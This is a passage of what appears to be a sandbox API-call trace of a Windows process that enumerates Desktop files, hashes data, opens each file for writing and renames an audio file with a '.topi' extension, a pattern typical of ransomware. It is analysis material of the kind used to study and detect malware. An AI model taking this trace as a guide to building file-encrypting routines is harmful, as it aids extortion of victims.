phProv=0x9ccfa50*=0x6deef8) returned 1 [0094.672] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.672] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.672] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.672] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.672] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.672] GetLastError () returned 0x0 [0094.672] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.672] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0094.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.672] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.672] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.672] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.672] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.672] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.672] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x123a0) returned 0x9a06a00 [0094.673] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.673] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.673] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.673] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.673] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.673] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.673] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3da8 [0094.673] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9120 [0094.673] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3df0 [0094.673] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9138 [0094.673] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9168 [0094.673] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.673] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9180 [0094.673] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.673] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.673] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.673] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.673] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9168 | out: hHeap=0x680000) returned 1 [0094.673] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9180 | out: hHeap=0x680000) returned 1 [0094.673] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.673] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.673] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.673] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.673] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0094.673] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9180 [0094.673] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0094.674] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9168 [0094.674] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0094.674] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.674] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.674] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.674] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.674] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.674] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.674] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.674] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.674] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9180 | out: hHeap=0x680000) returned 1 [0094.674] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.674] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9168 | out: hHeap=0x680000) returned 1 [0094.674] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.674] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.674] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.674] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.674] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.674] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.674] GetCurrentThreadId () returned 0x8c4 [0094.674] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.674] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e1f70 [0094.674] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.674] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.674] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.674] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.674] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.674] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.674] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.674] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.674] GetCurrentThreadId () returned 0x8c4 [0094.674] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.674] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.674] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.674] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.674] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.675] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.675] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.675] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.675] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9168 [0094.675] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0094.675] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9180 [0094.675] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.675] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9150 [0094.675] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.675] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.675] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.676] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\U1_x0Mr1zKGTIkq.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\u1_x0mr1zkgtikq.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\U1_x0Mr1zKGTIkq.m4a.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\u1_x0mr1zkgtikq.m4a.topi")) returned 1 [0094.677] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.677] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.677] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.678] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.678] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ab9f3a0, ftCreationTime.dwHighDateTime=0x1d5b6a6, ftLastAccessTime.dwLowDateTime=0x920d2b40, ftLastAccessTime.dwHighDateTime=0x1d5c580, ftLastWriteTime.dwLowDateTime=0x920d2b40, ftLastWriteTime.dwHighDateTime=0x1d5c580, nFileSizeHigh=0x0, nFileSizeLow=0x1191a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="W3jMO.gif", cAlternateFileName="")) returned 1 [0094.678] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\W3jMO.gif") returned=".gif" [0094.678] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\W3jMO.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\w3jmo.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.678] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=71962) returned 1 [0094.678] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.681] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x118f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.681] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.682] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.683] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.683] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.683] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.683] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.683] GetLastError () returned 0x0 [0094.683] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.683] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.683] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.684] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.684] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.684] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11920) returned 0x9a06a00 [0094.684] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.684] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3df0 [0094.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9138 [0094.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3e38 [0094.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9150 [0094.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9180 [0094.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9198 [0094.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.685] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.685] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9180 | out: hHeap=0x680000) returned 1 [0094.685] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9198 | out: hHeap=0x680000) returned 1 [0094.685] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.685] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.685] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0094.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9198 [0094.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0094.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9180 [0094.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0094.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.685] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.685] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9198 | out: hHeap=0x680000) returned 1 [0094.685] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.685] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9180 | out: hHeap=0x680000) returned 1 [0094.685] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.685] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.685] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.685] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0094.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.686] GetCurrentThreadId () returned 0x8c4 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e2000 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.686] GetCurrentThreadId () returned 0x8c4 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9180 [0094.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0094.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9198 [0094.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9168 [0094.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d91b0 [0094.687] HeapFree (in: 